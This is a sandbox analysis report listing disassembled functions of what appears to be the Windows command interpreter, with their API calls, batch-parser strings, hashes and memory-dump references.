                                                                                                                                                                                                                          • Opcode ID: 5cd9e4809c567f2d9b898d4dc043c705066c946eda89042c6657c20e7e075ac0
                                                                                                                                                                                                                          • Instruction ID: b4ec89dbb3bd68ab475d8867b31918f71c5940295e8a1250192ec8f8112797ca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cd9e4809c567f2d9b898d4dc043c705066c946eda89042c6657c20e7e075ac0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC1BF75A053549FDF24DF688C85BAA7BB9EF55304F1044AEE60AD6281EB708D80CF62
                                                                                                                                                                                                                          Function 00194710 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 435fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00194781
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001947E4
                                                                                                                                                                                                                          • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 001947EC
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001947FD
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00194805
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00194832
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001), ref: 0019483A
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00194871
                                                                                                                                                                                                                          • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000001), ref: 001A8120
                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,?), ref: 001A8191
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,?,00000000), ref: 001A8328
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 001A832F
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File_get_osfhandle$memset$ConsoleHandlePathPointerReadSearchSizeTypeWrite_closememmove
                                                                                                                                                                                                                          • String ID: DPATH
                                                                                                                                                                                                                          • API String ID: 2545859659-2010427443
                                                                                                                                                                                                                          • Opcode ID: 4c03db9770e4e169076921815dd997a081cd8ea4ae89c0a810add954e5f22ae1
                                                                                                                                                                                                                          • Instruction ID: 1991366b62180c0a055fa8bd7b35540d7cfa7e25754fde002cdfe9bf5e257350
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c03db9770e4e169076921815dd997a081cd8ea4ae89c0a810add954e5f22ae1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDF1EE75A093419FDB24DF24C848B6BBBE8FF89710F144A2EF48993290DB70D945CB92
                                                                                                                                                                                                                          Function 0019E0B0 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 308COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$iswspace
                                                                                                                                                                                                                          • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                                                                                                                          • API String ID: 759518647-875390083
                                                                                                                                                                                                                          • Opcode ID: e684a43dd9ed902db4962341e3b9af2619bab4b798529cafea77be5b1ac765da
                                                                                                                                                                                                                          • Instruction ID: 7b6a9b199f19a0d237555727bbafd750fd5d3f56795829a7f714a0099cea7c63
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e684a43dd9ed902db4962341e3b9af2619bab4b798529cafea77be5b1ac765da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35A1F1392453129BDF38AB69AC0AB3B33A4AF82714F54042FF543879D1DBF49881C766
                                                                                                                                                                                                                          Function 0019CF10 Relevance: 33.7, APIs: 15, Strings: 4, Instructions: 446COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                                                                                                                                                                          • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                                                                                                                                                                          • API String ID: 684130364-3872429996
                                                                                                                                                                                                                          • Opcode ID: cf2b7f90f110eaf8a01e3fda28a5653bfaf9c352fe035874c85caba4db85227e
                                                                                                                                                                                                                          • Instruction ID: 94941047751b872f0d6af4b157ba6d41e2358d7c144fd29a28b9fd2d383b9250
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf2b7f90f110eaf8a01e3fda28a5653bfaf9c352fe035874c85caba4db85227e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4E124B2D012119BCF248F69F98577A7BA0BF25381F684137EC46D7291E334DE8187A6
                                                                                                                                                                                                                          Function 0019EC2E Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 139COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001BE590,00002000,?,001D8BF0,00000000,?,?,00198F0D), ref: 0019EC51
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019EC77
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019EC8D
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECA3
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECB9
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECCF
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECE5
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ECF7
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0019ED0D
                                                                                                                                                                                                                            • Part of subcall function 00199310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,001BE590,?,00002000), ref: 00199342
                                                                                                                                                                                                                            • Part of subcall function 00199310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00199356
                                                                                                                                                                                                                            • Part of subcall function 00199310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 0019936A
                                                                                                                                                                                                                            • Part of subcall function 00199310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 0019937E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                                                                                                                                                          • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                                                                                                                                                          • API String ID: 2447294730-2301591722
                                                                                                                                                                                                                          • Opcode ID: c99c35732640353fa0ecea76ad6d6b77dce8e7ead053f1bc4a6cea128f4b8e34
                                                                                                                                                                                                                          • Instruction ID: 7fd71489ceade89385f4f4a6ea1aa6a9d2a808fc8029a595dcda914e48e8bef9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c99c35732640353fa0ecea76ad6d6b77dce8e7ead053f1bc4a6cea128f4b8e34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5031E73620A302BBEF18D775EC1EABB27DDFF46724B28441AF506D14D0EFA49540826B
                                                                                                                                                                                                                          Function 001B9C2E Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 250COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _wcsupr.MSVCRT ref: 001B9CC8
                                                                                                                                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 001B9D22
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 001B9D2A
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D3A
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D50
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001B9D58
                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D68
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 001B9D7C
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 001B9DDB
                                                                                                                                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 001B9DE2
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 001B9DF2
                                                                                                                                                                                                                          • towupper.MSVCRT ref: 001B9E13
                                                                                                                                                                                                                            • Part of subcall function 0019A16C: _close.MSVCRT ref: 0019A19B
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 001B9E6A
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B9E9B
                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 001B9EA9
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: _get_osfhandle.MSVCRT ref: 0019DDA3
                                                                                                                                                                                                                            • Part of subcall function 0019DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001AC050), ref: 0019DDAD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                                                                                                                                          • API String ID: 2015057810-1690691951
                                                                                                                                                                                                                          • Opcode ID: ac46d63a787d201c64c619777e7c003bb1f45bec2c660d8a6cae1c957fe13c85
                                                                                                                                                                                                                          • Instruction ID: 3c21fab0cbbbffebc6a0aefb8d7d39f43634671ad5ee56aa87548291cd648278
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac46d63a787d201c64c619777e7c003bb1f45bec2c660d8a6cae1c957fe13c85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C581E472A01214ABCF14DFB4DC45AEEBBB9AF49720F14412AF902E7290EB759D42C761
                                                                                                                                                                                                                          Function 0019790C Relevance: 28.7, APIs: 19, Instructions: 208COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199A11: _get_osfhandle.MSVCRT ref: 00199A1C
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0019793A,00000104,?), ref: 00199A2B
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A47
                                                                                                                                                                                                                            • Part of subcall function 00199A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A56
                                                                                                                                                                                                                            • Part of subcall function 00199A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374), ref: 00199A61
                                                                                                                                                                                                                            • Part of subcall function 00199A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(001D8E04,?,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00199A6A
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 00197943
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00197908,00002374,-00000001), ref: 00197951
                                                                                                                                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,001D0AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 001979BE
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00197A1C
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00197A27
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2173784998-0
                                                                                                                                                                                                                          • Opcode ID: 619dbfcefc10d08104eb7091475a98ab1497b8a402055c295543343f652fad43
                                                                                                                                                                                                                          • Instruction ID: b31df52329832b273826d5eb6ccf727c014b4874c23d86f7986bdbd73bdb47b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 619dbfcefc10d08104eb7091475a98ab1497b8a402055c295543343f652fad43
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8718075D02214AFDF14DFA5EC88ABEBBB9FF44311F54442AF806E6590DB349880CB51
                                                                                                                                                                                                                          Function 001B2859 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 001B2931
                                                                                                                                                                                                                          • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 001B2998
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                          • API String ID: 2411632146-3173542853
                                                                                                                                                                                                                          • Opcode ID: 5eabf1c2967e77317c54ee903dcccafb3da377eaf1e1397235164eed63b74881
                                                                                                                                                                                                                          • Instruction ID: cf84d7401708911c5a3292d86939f4954a991e1bf4924d14f04e2d4694be2c9b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eabf1c2967e77317c54ee903dcccafb3da377eaf1e1397235164eed63b74881
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70512471900314EBDF316F288C09EABB7F8EF58B04F00455DF56AA2561D771DA98DB21
                                                                                                                                                                                                                          Function 001A0590 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 181fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,001AB7DB,0000000C,00000004,00000080,00000000), ref: 001A05FF
                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 001A0613
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001A0663
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 001A0695
                                                                                                                                                                                                                          • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 001A06D3
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 001A06FB
                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 001A0717
                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 001AE89D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                          • API String ID: 58404892-4257191772
                                                                                                                                                                                                                          • Opcode ID: 781534bbccd306dd9455689bc694ab81119e3e6c3fda03a151fd1cb13ba12f77
                                                                                                                                                                                                                          • Instruction ID: 5a2f28d3559d2e694fb223a2ac6dbcf9f9fb088787a3446b4a5b13a8d7991b63
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 781534bbccd306dd9455689bc694ab81119e3e6c3fda03a151fd1cb13ba12f77
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5512874A01204AFDB11CFA4DC49FBEB7B8EF4A724F60422AF825E31D0D77589518B61
                                                                                                                                                                                                                          Function 001BC5F2 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC62E
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC656
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC6C7
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 001BC6E6
                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 001BC72A
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001BC747
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001BC76C
                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 001BC794
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC7B3
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 001BC7C5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                          • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                          • Opcode ID: d648434201b32f5aa6c73d4bee2e244b798419eda3d4705cb1631e2aa7e6f54a
                                                                                                                                                                                                                          • Instruction ID: 15b83991ae61af5357b4c4616919d7eab681bbe6ddf00e70aed0986a9d992faf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d648434201b32f5aa6c73d4bee2e244b798419eda3d4705cb1631e2aa7e6f54a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E55120B1A012196BDB20DAA9DC89AEBBBB8EF55344F4400AAF505D3140EB74DE84CF65
                                                                                                                                                                                                                          Function 00199789 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                          • API String ID: 2081463915-3124875276
